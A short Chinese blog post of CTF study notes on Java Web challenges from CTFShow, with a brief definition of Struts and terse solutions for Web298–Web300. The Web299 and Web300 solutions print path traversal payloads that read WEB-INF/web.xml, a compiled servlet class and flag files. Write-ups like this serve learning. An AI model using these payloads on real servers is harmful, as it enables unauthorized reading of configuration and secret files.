CTF:JAVA Web学习记录与总结

yansui Lv3
  2023-07-12 23:47:20 2023-07-12 23:47:20 创建   2023-07-12 23:46:51 2023-07-12 23:46:51 更新  

啥也不会,随便写写了

CTF:JAVA Web学习记录与总结

一、Java 语言基础

因为我也不太会 不写了

二、Java Web开发基础

2.1 Java Web开发基础知识

什么是struts?

Struts是一个开源的Java Web应用程序框架,用于开发基于Java的企业级Web应用程序。它提供了一套功能强大的工具和库,以简化Web应用程序的开发过程。
Struts框架遵循了MVC(Model-View-Controller)设计模式,它将应用程序的不同方面分离开来,使开发人员能够更好地组织和管理代码。

2.2 Java Web开发环境搭建

三、CTFShow题解

Web279-Web282

之前做过了 都比较无聊 不写了

Web283

都好无聊啊

Web298

这题好像还行 玩玩看

1.war包可以直接用bandzip解压

2.JD-GUI真好用

3.Java中对string的==比较比较的是地址

4.本题应该配置了tomcat的context是/ctfshow,但是对应的配置文件原来应该在META-INF中,没有给出

参考链接

Web299

首先需要读取web.xml文件:

1
/view-source?file=/WEB-INF/web.xml

直接读取getFlag类:

1
/view-source?file=/WEB-INF/classes/com/ctfshow/servlet/GetFlag.class

读flag:

1
/view-source?file=../../../../../fl3g

什么答辩题目

还是学习一下WEB-INF的目录结构:类名叫com.ctfshow.servlet.GetFlag,目录就是
/WEB-INF/classes/com/ctfshow/servlet/GetFlag.class 可以看出来关系还是很明显的

Web300

paylaod:?file=../../../../../f1bg
跟上面一题一样 直接抄了

emm总体感觉这些题不太行,收获不大

  • 标题: CTF:JAVA Web学习记录与总结
  • 作者: yansui
  • 创建于: 2023-07-12 23:47:20
  • 更新于: 2023-07-12 23:46:51
  • 链接: http://yansui.xyz/2023/07/12/Java/
  • 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。
 评论
此页目录
CTF:JAVA Web学习记录与总结
  1. CTF:JAVA Web学习记录与总结
    1. 一、Java 语言基础
    2. 二、Java Web开发基础
      1. 2.1 Java Web开发基础知识
      2. 2.2 Java Web开发环境搭建
    3. 三、CTFShow题解
      1. Web279-Web282
      2. Web283
      3. Web298
      4. Web299
      5. Web300